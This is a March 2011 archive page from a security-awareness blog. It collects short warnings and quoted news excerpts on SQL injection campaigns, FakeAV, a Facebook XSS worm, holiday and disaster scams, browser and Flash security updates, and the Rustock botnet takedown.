March 2011 - Posts
Please be careful with all website links that are presented to you in Facebook, email, or in web searchers. Attackers are using SQL Injection attacks to seed vulnerable websites with FAKEAV and other malware.
LizaMoon Mass SQL Injection Attack continues
QUOTE: Websense Security Labs discovered a mass-injection campaign infecting more than 28,000 URLs, including a few Apple iTunes URLs that redirect users to a rogue AV site. Attackers have launched a large-scale SQL injection attack that has compromised several thousand legitimate Websites, including a few catalog pages from Apple's iTunes music store.
Websense Security Labs and the Websense Threatseeker Network discovered the mass-injection campaign that compromised over 28,000 URLs, including several iTunes URLs, according to Patrik Runald, a senior manager of security research at Websense Security Labs, who posted an alert on the Security Labs blog. The mass-injection attack has been named LizaMoon after the domain hosting the attack code.
Unlike the recent SQL injection attack that affected MySQL.com and Sun.com, this mass injection is a SQL injection attack against a large volume of legitimate sites. The LizaMoon attack inserts a line of code referencing a PHP script that redirects users to another malware site.
While this AVERT warning pertains primarily to the UK, please be careful with all EMAIL messages that seem to come from the IRS or other official agencies. Remember that the IRS does not have your email address and usually criminals want personal or bank account information. Only work through trusted sources.
Tax Season - Beware of scams and fake messages
QUOTE: As the saying goes: Death and taxes are the only constants in life. This adage can be applied to scams on the Internet as well. Every tax season we can count on scams like these to raise their heads and try to bilk users out of their identity information and hard-earned money. A few of the messaging and spam researchers at McAfee Labs sent me some samples earlier today that I would like to share.
Trend has just offered a new beta version of a standalone FAKEAV removal tool. This new process based cleaner appears to be comprehensive. It can be downloaded free of charge and used in SAFE MODE to clean these complex infections.
Trend Micro - Creates new FAKEAV standalone removal tool
QUOTE: Fake Antivirus (FakeAV) threats have been rampant in the past few years. Various FAKEAV variants have infected millions of PCs and are continuously spreading worldwide. One reason why FAKEAV infections have become well-known to users is because they have visual payloads. Variants of the malware family often display pop-up messages telling users that their machines have been infected. This may cause panic among users, pressuring them to purchase rogue antivirus applications in the hope of resolving the issue. Users, however, should never purchase antivirus software from unknown sources.
eWeek shares this article related to IE9, noting many new improvements in functionality and security
Internet Explorer 9 - Ten Reasons to Use it
QUOTE: Microsoft has officially launched Internet Explorer 9. Although the browser’s history has been spotty, Internet Explorer 9 is the one new browser that every user should be trying. Microsoft has officially launched Internet Explorer 9. The browser, which is being touted by many reviewers already as the best version of the software the company has ever released, follows a long line of predecessors that at times won customers over and at other times failed miserably. But it's a new day for Microsoft and Internet Explorer. The time has finally come for the company to face Google's Chrome browser head-on.
1. It's fast
2. A vastly improved interface
3. It's awfully Chrome-like
4. The Pinned Sites feature is nice
5. It's much more secure
6. It's a big step up over previous versions
7. The enterprise will be happy
8. A new Microsoft?
9. Putting an end to tracking
10. It's another good reason to ditch Windows XP
Please be careful with links that might be presented to you in Facebook. Another new XSS worm is circulating that can automatically post messages with malicious links on Facebook walls of your friends and contacts.
Facebook - New XSS Worm Allows Automatic Wall Posts
QUOTE: Currently a new and unpatched cross-site scripting (XSS) vulnerability in Facebook is being widely used to automatically post messages to other user’s walls. The vulnerability was used for some time in some smaller cases; however, it is now widely being used for the first time by many different groups—especially in Indonesia, where we are seeing thousands of infected messages being posted by unknowing users.
Any user who is logged into Facebook and visits a site that contains such an element will automatically post an arbitrary message to his or her wall. There is no other user interaction required, and there are no tricks involved, like clickjacking. Just visiting an infected website is enough to post a message that the attacker has chosen. Therefore it should be of no surprise that some of those messages are spreading very fast through Facebook.
Mouse Training Company - Free MS Office Training Manuals
QUOTE: We have made all our MS Office training manuals available to download for free. The files are in PDF format that will allow you Save, Print or Email to yourself. If you are not a Mouse Training client and would like to make use of the manuals, we kindly ask that you provide a HTML link back to our site from your company website. Please use the following information for the link. The manuals are copyright protected under Wiki Commons License. This agreement will allow you to download, edit, distribute and store the manuals without limit.
Internet Private Browsing - IE, Firefox, and Chrome
QUOTE: Chrome, Firefox, and Internet Explorer released major updates this week. The timing may be a coincidence or not but there is a very interesting feature that all three browsers are developing almost at the same time—private browsing.
Each of the three approaches to private browsing has its merits:
• Mozilla Firefox advocates the use of a new HTTP header that, with time, all websites should honor
• Google Chrome instead uses a blacklist of websites published by Google
• Microsoft Internet Explorer is similar, except that it allows for a more granular control over lists
Finally, private browsing! But how does this change my life? Well, for starters, you can now minimize the amount of targeted advertising you’re exposed to. That’s if you want to, of course. The key element is choice. The three main browsers have chosen three very different ways to implement privacy.
Some of the key security enhancements found in the new version of Firefox are listed below:
Firefox 4 Security Features
Firefox 4 - All Features (Technical writeup)
QUOTE: Like no other release before it, Firefox 4 includes a number of significant security features. These features are addressing attacks that are in particularly hard to avoid by developers and in which the browser is more so the victim then the server.
These attacks, Cross Site Scripting (XSS), redirects to HTTP pages from HTTPS and Clickjacking use vulnerable web applications more as a mirror to bounce attacks into the browser. The browser can provide meaningful protection against these attacks, unlike for more server centric attacks like sql injection, for which the attacker is in full control of the client.
All Apple Mac OS X users should update their systems as prompted. There were 53 issues addressed in several components including third party software
Apple Mac OS X - Security Update 2011-001
Mac OS X v10.6.7 and Security Update 2011-001
QUOTE: This document describes the security content of Mac OS X v10.6.7 and Security Update 2011-001, which can be downloaded and installed via Software Update preferences, or from Apple Downloads.
We should be careful when sharing information on Facebook and other social networks. Sometimes, I see friends sharing advanced plans of a trip, vacation, or other outing. As these posts are often available to the general public, there have indeed been accounts of folks burglarized while away and criminals confusing that they discovered it via a Facebook post.
Social Network Users too friendly in sharing information publicly
QUOTE: It's old news that people are way too trusting on social media sites with their personal information, but it's no less disturbing for being banal. Would you walk around on the street holding a sign displaying your birthday, home town, and other data people commonly put in their Facebook public profiles?
ID Analytics's message is that you shouldn't be one of the low-hanging fruit. They have 3 rules of thumb for protecting your identity:
1. Be careful what you share
2. Protect what you have
3. Monitor, monitor, monitor
ID Analytics - In-depth study of Privacy
Below is an interesting post from the ISC reflecting an unexplained sharp decrease in port 1434 attacks by the decade old SQL Slammer worm
Port 1434: Sudden Slammer Decline?
QUOTE: We're interested to know what's happening out there. It has been observed through DShield data that Slammer traffic has had a sudden decline. I played with the data for a while. I could make it look like many things, such as slow and steady decline over time. However, the most compelling story is the one where the data drops on March 9 and 10.
Below is the DShield data and graph on port 1434 for March 2011. It's speculative at this point as to the cause of the sudden drop. Japan's earthquake or Patch Tuesday have been kicked around. I would be remiss if I did not mention Kevin Liston's series on Slammer Cleanup during October. We are loving the thought his great effort was a catalyst for the eradication of it. So go back and take a look at your data for us and share what you're seeing.
Please update the Adobe Flash component for your browsers as automatically prompted
Adobe Flash Player update addresses a critical security issue (CVE-2011-0609)
QUOTE: A critical vulnerability has been identified in Adobe Flash Player 10.2.152.33 and earlier versions (Adobe Flash Player 10.2.154.18 and earlier versions for Chrome users) for Windows, Macintosh, Linux, and Solaris operating systems, and Adobe Flash Player 10.1.106.16 and earlier versions for Android. This vulnerability (CVE-2011-0609), as referenced in Security Advisory APSA11-01, could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being exploited in the wild against Flash Player in targeted attacks via a Flash (.swf) file embedded in a Microsoft Excel (.xls) file delivered as an email attachment.
Microsoft and other security firms continue to fight spam, botnets, and other sophisticated attacks. Recently a major complex botnet known as Rustock was taken offline reducing spam attacks and helping to improve Internet safety
Microsoft's DCU unit disrupts Rustock botnet
QUOTE: Just over a year ago, we announced that the Microsoft Digital Crimes Unit (DCU), in cooperation with industry and academic experts, had successfully taken down the botnet Waledac in an operation known as “Operation b49”. Today, I’m happy to announce that based on the knowledge gained in that effort, we have successfully taken down a larger, more notorious and complex botnet known as Rustock. This botnet is estimated to have approximately a million infected computers operating under its control and has been known to be capable of sending billions of spam mails every day, including fake Microsoft lottery scams and offers for fake – and potentially dangerous – prescription drugs.
Thankfully, I've been able to move to IE8 for all home and work systems. However, there are some legacy web applications that still may not run under the latest versions of Internet Explorer. This new tool allows IE6 based applications to run in a virtualized mode in an IE8 tab if needed.
Browsium UniBrows Tool - Run IE6 inside IE8 or IE9
QUOTE: Most of the world may be running away from Internet Explorer 6 as fast as they can, especially now that it's officially 3 versions old, but there are users who can't make the decision so easily. Many businesses wrote in-house web-based applications, sometimes called "line of business apps," which relied on IE-specific features. In the long run they will have to change, but in the meantime Browsium has a solution that let these companies put off the decision even longer. UniBrows is a tool that IT can use to allow IE8 users on Windows XP or Windows 7 to run Internet Explorer 6 apps in a tab under IE8. Browsium says that they will support IE9 when the final release is available, so presumably that will be soon.
Browsium UniBrows Tool - Run IE6 inside IE8 or IE9
QUOTE: Move your organization to Windows 7 or IE8 on Windows XP and keep your IE6 line of business applications intact—without changing a single line of code. UniBrows enables IE6 web applications to run inside an IE8 tab, empowering your organization to streamline the migration process and avoid the complexity and costs of virtualization.
Within two hours of the 9.0 magnitude earthquake impacting Japan, a fake phishing site was established. Always be careful with e-cards, related email, or websites during special holidays or news events.
My thoughts, prayers, and deepest sympathies extend to those impacted by this great tragedy. Please always donate to mainstream sites like the Red Cross or others that are trustworthy. This way your money will be going to the people affected, rather than criminals.
Japanese Earthquake based scams and malware circulating
QUOTE: Approximately two hours after an 8.9 earthquake hit northeast Japan we spotted the first potential donation scam site. We’ve seen this before of course, but for a scam site to appear in just two hours–indexed and with content–is pretty quick in my experience. Hundreds of domains that could be related to the disaster have been registered so far today; we’re keeping an eye on them.
Always be careful with e-cards, related email, or websites during special holidays or news events.
St Patrick's Day based scams and malware circulating
QUOTE: have blogged many times about how cybercriminals and scammers use holidays, sporting events, and disasters as lures in their never-ending schemes. Just like with tax season, every Valentine’s Day we see more scams. Most high-profile sporting events, such as the FIFA World Cup, inspire them; and certainly recent events like the earthquakes in Haiti, Chile, and Japan serve as bait for these schemes. St. Patrick’s Day finds itself in the same situation.
Mozilla's Firefox browser is a great complimentary browser that I use in conjuction with Internet Explorer. After beta testing the new version for several months, it has been promoted to the Release Candidate stage. This indicates a production release will be forthcoming in the future
Firefox 4 - moves from Beta to Release Candidate stage
In recent years, malware has sometimes found it's way to USB based devices (e.g., Flash Drives, MP3 players, etc). On infected PCs, many malware agents will search for these devices to add a copy there as well. Microsoft's latest changes to Autorun helps prevent these devices from starting automatically and is available by Windows Update now. The Auto run process is a key technique used to infect other systems. However, users can always start these devices manually. It's a best practice to always scan your portable media devices periodically for malware and always do this when the source might be untrusted
Microsoft’s Autorun update v2.1 now automatically deployed from Windows Update
QUOTE: Microsoft have moved their Windows Autorun V2.1 (967940) update patch from optional updates to automatic updates. This is the same patch that was released in last month’s patch Tuesday. When Windows update is next run, this patch will automatically be selected to apply to your machine. This is more likely to affect home users, as companies should be using group policies to control how USB autorun settings operate. Expect one or two calls from confused family members on why their favourite autorun USB stick application has stopped working.